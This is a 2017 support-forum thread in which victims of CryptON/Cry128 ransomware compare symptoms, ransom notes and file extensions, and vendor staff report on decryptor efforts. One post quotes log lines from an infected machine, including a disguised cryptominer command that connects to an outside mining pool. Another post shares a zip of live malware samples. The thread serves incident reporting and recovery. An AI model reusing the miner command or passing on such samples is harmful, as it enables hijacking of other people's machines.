Maxim Posted April 21, 2017 Report Share Posted April 21, 2017 Hi! It looks like I was attacked by a new version of CryptON ransomware (post-Cry9). All the encrypted files are 36 bytes longer than their original versions. Find a couple of examples attached. Appreciate if you could help with the decryption. Thank you. SQLIO.zip write_company_note.zip Link to comment Share on other sites More sharing options...
McGaz Posted April 24, 2017 Report Share Posted April 24, 2017 I've also been hacked by (what I think is) this one and have 36 bytes longer too. Do you suspect that they got in via remote desktop? Link to comment Share on other sites More sharing options...
pursang Posted April 24, 2017 Report Share Posted April 24, 2017 Make that a "Me too"; also for the RDP question. However, I'm still trying to figure out how they pulled that one - AFAIK no password(s) (was)were compromised. If anyone wants some details of what I have, feel free to ask. Waiting patiently to see if there's a resolution. Fingers crossed. Link to comment Share on other sites More sharing options...
Sarah W Posted April 24, 2017 Report Share Posted April 24, 2017 Hi all, Yes, they are hacking in via insecure RDP configuration. Make sure if you continue to use RDP that you set a strong password. We are looking into it and hopefully will have something for you in terms of decryption, though it may take a while since the member who does the decryption is ill. Regards, Sarah Link to comment Share on other sites More sharing options...
McGaz Posted April 25, 2017 Report Share Posted April 25, 2017 Thanks for the update Sarah. Link to comment Share on other sites More sharing options...
Abhijit Posted April 26, 2017 Report Share Posted April 26, 2017 Thanks Sarah. Appreciate the same and await for further update Link to comment Share on other sites More sharing options...
Battery Low Posted April 26, 2017 Report Share Posted April 26, 2017 Exact same problem here, I shall be thankful to you sarah if you could provide any solution to this. Link to comment Share on other sites More sharing options...
hmtech Posted April 26, 2017 Report Share Posted April 26, 2017 Same issue with us. Have a pc struck with a new version of crypton. files changed to *[wqfhdgpdelcgww4g.onion.to].mf8y3, but size seems to be the same between the original and the encrypted one .. When we uploaded the ransom note file and an ecrypted via ID Ransomware, we got 2 results. That it's either Cry128 (which is still under analysis) or Cry9 (but we tried the decryptor and we got an error that it's not a valid crytpton file pair etc. (probably it was via rdp here too..) Link to comment Share on other sites More sharing options...
schfrank Posted April 26, 2017 Report Share Posted April 26, 2017 hi i from taiwan sos............ _DECRYPT_MY_FILES.txt 免服編號.txt.id_6014747_2irbar3mjvbap6gt.onion.to._ Link to comment Share on other sites More sharing options...
Edwin Posted April 26, 2017 Report Share Posted April 26, 2017 Same problem here! Looking for solution... Shell I format my computer wait for cry128 decryptor? Or leave it and wait for decryptor? (I have made copy of infected files) Link to comment Share on other sites More sharing options...
monkeymatic Posted April 27, 2017 Report Share Posted April 27, 2017 On 26/04/2017 at 6:39 PM, Edwin said: Same problem here! Looking for solution... Shell I format my computer wait for cry128 decryptor? Or leave it and wait for decryptor? (I have made copy of infected files) Can't really give advice beyond...I think it's always best to leave it and wait, just in case, maybe image your hard drive if you wanna format, then you can always re-image to get the original setup back Link to comment Share on other sites More sharing options...
Sarah W Posted April 27, 2017 Report Share Posted April 27, 2017 On 26/04/2017 at 6:39 PM, Edwin said: Same problem here! Looking for solution... Shell I format my computer wait for cry128 decryptor? Or leave it and wait for decryptor? (I have made copy of infected files) Hi Edwin, You can format your computer and then copy over the encrypted files to the new system. We are currently still working on the solution. Regards, Sarah 1 Link to comment Share on other sites More sharing options...
Battery Low Posted April 28, 2017 Report Share Posted April 28, 2017 10 hours ago, Sarah W said: Hi Edwin, You can format your computer and then copy over the encrypted files to the new system. We are currently still working on the solution. Regards, Sarah Appreciate your efforts, waiting for some solution... Link to comment Share on other sites More sharing options...
mikeody1989 Posted April 28, 2017 Report Share Posted April 28, 2017 Hi New member here! Same issue (36 bytes difference between original and encrypted file). RDP password was very strong although we used the default port and it wasn't secure. When we kicked them out, they removed us from their database so we don't even have the option of paying the ransom... Thankfully we have original files to match with the encrypted ones in case Emsisoft releases a decryptor. We really appreciate your efforts guys! Sending positive energy! Link to comment Share on other sites More sharing options...
juicefish Posted April 28, 2017 Report Share Posted April 28, 2017 I have same problem on my PC. Here's some files of mine infected files. Sounds like RDP is a problem let it can access my PC, but I've close all Windows 7 native RDP before it happened. If there have some problem that can be done in Chrome RDP? (I notice that I recieve google account login SMS, but I don't login and input code) Or I just have wrong knowledge with RDP Hacking? Cry128_Sample.zip Link to comment Share on other sites More sharing options...
djunges Posted April 30, 2017 Report Share Posted April 30, 2017 hi, we are from brasil and our server has the same issue, can anyone help us please ? regards and advance thanks djunges Link to comment Share on other sites More sharing options...
izuran Posted May 2, 2017 Report Share Posted May 2, 2017 Hi, I have the same issue, here is a sample with a file Before and After. It seems to be triggered from a file called: QQSS77889900.EXE And created other exe like: L.EXE, A.EXE, A[1].exe, A[2].exe, G.exe, a[3].exe _DECRYPT_MY_FILES.txt Summary.xml Summary.xml.id_1756635677_2irbar3mjvbap6gt.onion.to._ I would also add do not try to pay for these to be de-crypted as it does not work. Link to comment Share on other sites More sharing options...
XeuZ Posted May 2, 2017 Report Share Posted May 2, 2017 Hi, I have the same problem!! I Have a Backup, but i can't recovery some files from the backup. Do you have some news about the decryptor? 28-02.xls 28-02.xls.id_2905610453_2irbar3mjvbap6gt.onion.to._ qqss77889900.exe _DECRYPT_MY_FILES.txt 15321.exe Link to comment Share on other sites More sharing options...
Demonslay335 Posted May 2, 2017 Report Share Posted May 2, 2017 Fabian Wosar has released a decrypter for Cry128, the newest variant of this Nemesis/CryptON garbage. http://blog.emsisoft.com/2017/05/01/remove-cry128-ransomware-with-emsisofts-free-decrypter/ Link to comment Share on other sites More sharing options...
mclaugb Posted May 2, 2017 Report Share Posted May 2, 2017 My files have the same gebdp3k7bolalnd4.onion._ extensions. Mine was a windows machine with Remote Desktop connections disabled but Remote assistance enabled. I consider myself very computer savvy but so far I've found no applications, no processes running in the background. MalwareBytes and McAfee both cannot detect this strain. Files do not appear to be any specific number of kb larger than the originals (it seems to vary depending on the file). The Cry128 decrypter attempted two sets of files without success. I've attached a few files here. I can come up with more of them. Bobbin REV 6 Specification print.pdf Bobbin REV 6 Specification print.pdf.id_1638578921_gebdp3k7bolalnd4.onion._ TDS-DC25-UB25-RW-MAC-07-2014.pdf TDS-DC25-UB25-RW-MAC-07-2014.pdf.id_1638578921_gebdp3k7bolalnd4.onion._ Link to comment Share on other sites More sharing options...
pursang Posted May 2, 2017 Report Share Posted May 2, 2017 I didn't have any luck with the new tool, although my files appear to be strong candidates. So, now I'm wondering about the tool. Does it have a better chance of success if it has more memory available? Larger files? What? Clearly Fabian has had successful hits in finding keys, but there seems to be hidden depths to this one. What more can we (the community) do to help? Link to comment Share on other sites More sharing options...
mikeody1989 Posted May 2, 2017 Report Share Posted May 2, 2017 Unfortunately no luck for us either :/ On this link: http://blog.emsisoft.com/2017/05/01/remove-cry128-ransomware-with-emsisofts-free-decrypter/ it mentions 16 bytes, whereas in our case (and most of the people in this thread from what I understand) it is 36 (EDITED TYPO) bytes. The decryptor accepts the files anyway... but with no luck in brute forcing the key (we tried several files). Does that mean we are out of luck? I am attaching files here in case someone can... save my life EntityFramework.xml.id_3575451207_2irbar3mjvbap6gt.onion.to._ EntityFramework.xml Link to comment Share on other sites More sharing options...
TheMask Posted May 2, 2017 Report Share Posted May 2, 2017 yes we need 32bytes decryptor (not 16bytes) original file 500bytes encrypted file 532bytes i think we are out of luck Link to comment Share on other sites More sharing options...
mclaugb Posted May 2, 2017 Report Share Posted May 2, 2017 We're finding that many of the encrypted files are the exact same filesize as the unencrypted originals. See the attached files. 3X8Sheep_Base_SingleBlock.dxf 3X8Sheep_Base_SingleBlock.dxf.id_1638578921_gebdp3k7bolalnd4.onion._ Link to comment Share on other sites More sharing options...
TheMask Posted May 2, 2017 Report Share Posted May 2, 2017 my files have all same size. encrypted files is 32 bytes more than the original files maybe emsisoft will release new decrypter maybe we are lucky Link to comment Share on other sites More sharing options...
Shlomi Posted May 3, 2017 Report Share Posted May 3, 2017 Hi, Thank you for the quick release for the cry128 Ransomware. Unfortunately, I tried it and after 80% of brute-forcing the files - it said that it failed to generate the key. I'm 99% sure I was attacked by the cry128 (checked online by submitting the files, 36 bytes, same ransom note, same extension etc..) Can you suggest what else I can do? Maybe I have a newer version?? (I submitted the files to you) Thanks! Link to comment Share on other sites More sharing options...
Geng Posted May 3, 2017 Report Share Posted May 3, 2017 Correcting a couple of the above users who said they have a 32 byte difference - it's 36 bytes, at least, that's what 99% of us here are dealing with. 1 Link to comment Share on other sites More sharing options...
Borro97 Posted May 3, 2017 Report Share Posted May 3, 2017 Me too - many (almost all) files 36 bytes bigger.. - some zip files only renamed Decrypter Cry128 did not work . After 100% I got this message at the end. "The decryption key for your system could not be found. Please attempt to drag and drop both an encrypted and its original file on the decrypter executable. If that didn't work there is unfortunately no way this decrypter will be able to decrypt your files. We instead suggest to restore your files from your latest backup." Thanks Link to comment Share on other sites More sharing options...
DrAries77 Posted May 3, 2017 Report Share Posted May 3, 2017 Dear All, on 28th April almost all files of my PC was encrypted by the ransomware gebdp3k7bolalnd4.onion._ We need to pay "You need to pay: 0.14451 BTC (~200$)" to receive the decrypter (HOPE)... Do you have found any solution for this bastard ransomware? Regards. Link to comment Share on other sites More sharing options...
mclaugb Posted May 3, 2017 Report Share Posted May 3, 2017 Okay, here are some more data points for you anti-virus making people. Mcafee, your tools are not detecting this one. These are logs from Windows Application Logs. Started svchost.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:8888 -u 48aNFV3juaCLLQF8zPtdwdgvxt3YX1HmC3nvCu9psPuBDcoEBJGps3YFKU2diFBLby7WoQUqAo3ZP1Z3ay9yt2fDVAaWBuj -p x for service Mysqlvers in C:\windows. Started C:\Windows\dell\run64.bat for service Windows32_Update in C:\Windows\dell. bat file says: Update64 -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45EngfR9yFHGSGLXMSVh88XuErCN95qQYirYNm4pVaJDakxthy3KWPP2hgDBVaAwcBafup6sefXML3CTYXmZfSJLUfHQQXW -p x -dbg -1 In c:\windows\dell there is 'run.bat' 'run64.bat' 'svchost.exe' Other windows application logs show: C:\Windows\systxm\winlogon.exe NT AUTHORITY\SYSTEM ran C:\Windows\svchoot.exe, which attempted to access C:\Windows\systxm\svchost.exe. The potentially unwanted program named CoinMiner was detected and deleted. Mysqlvers 1500 2000 Mysqlvers 0 Restart svchost.exe Link to comment Share on other sites More sharing options...
mclaugb Posted May 3, 2017 Report Share Posted May 3, 2017 I can post the .exe files from this folder if anyone wants them. I submitted them to Emisoft's website. But i don't want to infect others. Link to comment Share on other sites More sharing options...
mclaugb Posted May 3, 2017 Report Share Posted May 3, 2017 I am posting the infected files here. I have attached them here in "dell_Infected.zip". The zip file requires a password "infected" to open it. Please use with caution as they are infected .exe files with the CRY128 virus. dell_Infected.zip Link to comment Share on other sites More sharing options...
GeorgeB Posted May 6, 2017 Report Share Posted May 6, 2017 Mcl On 5/3/2017 at 4:13 PM, mclaugb said: I am posting the infected files here. I have attached them here in "dell_Infected.zip". The zip file requires a password "infected" to open it. Please use with caution as they are infected .exe files with the CRY128 virus. dell_Infected.zip Please send infected exe archive to me. I want to let it to encrypt some files in vm. Link to comment Share on other sites More sharing options...
izuran Posted May 7, 2017 Report Share Posted May 7, 2017 Just for reference this thing seems to only alter the first 10KB of information and the end 36bytes, which it adds on. The last 4bytes is always the same on that computer. So if you have a large database or file type with recovery tools, you can likely try to rebuild it. Link to comment Share on other sites More sharing options...
mclaugb Posted May 8, 2017 Report Share Posted May 8, 2017 I ran R-soft deleted files recovery in case the ransomware had deleted the old files and left the file system table. it came up with some deleted files but most are not readable--some were but all the old filenames are gone. I did find some easy files to compare using a DIFF function in a hex editor. These files are mostly ASCII text files (they were autocad files) so they make it very easy to see what the ransomware did. If any of you know how to decrypt codes, these should be two easy files to look at. 3X8Sheep_Base_SingleBlock.dxf 3X8Sheep_Base_SingleBlock.dxf.id_1638578921_gebdp3k7bolalnd4.onion._ Link to comment Share on other sites More sharing options...
Sarah W Posted May 9, 2017 Report Share Posted May 9, 2017 Hi all, We are currently still looking into seeing whether the ransomware is decryptable or not. We will let you know if we find out whether it is or not. There may be a cryptocoin miner on the system (a program which uses your CPU to mine a cryptocurrency for the criminal, in this case), so if you want to check whether the system is clean then you can use our product; Emsisoft Anti-Malware. If you like our product and it is of help then please consider buying it; the price is discounted and we protect against ransomware such as this one. Some other advice is that investing in a good backup procedure is very important and well worth it. I would suggest having two or more backups, at least one disconnected. Regards, Sarah Link to comment Share on other sites More sharing options...
lemmer89 Posted May 28, 2017 Report Share Posted May 28, 2017 Hello dear Sarah and other contributors, My computer also has been infected (happened on end of April). A few gigabytes of precious data that was never backed up are waiting for a decrypt solution. Nothing new here, same kind of files with 36 bytes added on the file size, with suffix ".id_2281068xxx_gebdp3k7bolalnd4.onion._" added to file names. Some zip files were renamed but left untouched by the ransomware (i presume it was cry128). Now, all of my company's computer have Emsisoft antimalware installed since this attack could have destroy several years of labour : or at least several days, since most of us use backup devices from time to time. Regarding the "non backed up data" : we are crying for your precious help. If required, i can upload some infected files alongside with the original file. As a footnote : regarding infeted text files, it seems that only part of the file (say the first kilobytes) are encrypted. Just want to say : good luck :-) Link to comment Share on other sites More sharing options...
lemmer89 Posted June 13, 2017 Report Share Posted June 13, 2017 Hello Again. Looks like Cry128 really was a difficult one. Anyone from Emsisoft could post an updated status here ? Great thanks and kind regards. Link to comment Share on other sites More sharing options...
MrDat Posted June 25, 2017 Report Share Posted June 25, 2017 Dear all, These are what in my PC today: ### DECRYPT MY FILES ###.TXT *** ALL YOUR WORK AND PERSONAL FILES HAVE BEEN ENCRYPTED *** To decrypt your files you need to buy the special software – «Nemesis decryptor» You can find out the details / buy decryptor + key / ask questions by email: [email protected] Your personal ID: 2840776094 All filenames are: <OriginalFilename>.id-2840776094_[[email protected]].5d4s9 Encrypted file's size is more than 36 characters the original size, they are in attachments. I think it's CRY36 but I tried with Avast, Kaspersky, Emsisoft... NOT WORKING! Please help me, thanks! allInOne.js allInOne.js.id-2840776093_[[email protected]].5d4s9 favicon.ico favicon.ico.id-2840776093_[[email protected]].5d4s9 ### DECRYPT MY FILES ###.txt Link to comment Share on other sites More sharing options...
mrhadavand Posted July 15, 2017 Report Share Posted July 15, 2017 On 6/25/2017 at 11:50 PM, MrDat said: Dear all, These are what in my PC today: ### DECRYPT MY FILES ###.TXT *** ALL YOUR WORK AND PERSONAL FILES HAVE BEEN ENCRYPTED *** To decrypt your files you need to buy the special software – «Nemesis decryptor» You can find out the details / buy decryptor + key / ask questions by email: [email protected] Your personal ID: 2840776094 All filenames are: <OriginalFilename>.id-2840776094_[[email protected]].5d4s9 Encrypted file's size is more than 36 characters the original size, they are in attachments. I think it's CRY36 but I tried with Avast, Kaspersky, Emsisoft... NOT WORKING! Please help me, thanks! allInOne.js allInOne.js.id-2840776093_[[email protected]].5d4s9 favicon.ico favicon.ico.id-2840776093_[[email protected]].5d4s9 ### DECRYPT MY FILES ###.txt please help meee !!!!!! __Sys__.ldf.id_3946907184_[[email protected]].5d4s9 Link to comment Share on other sites More sharing options...
Recommended Posts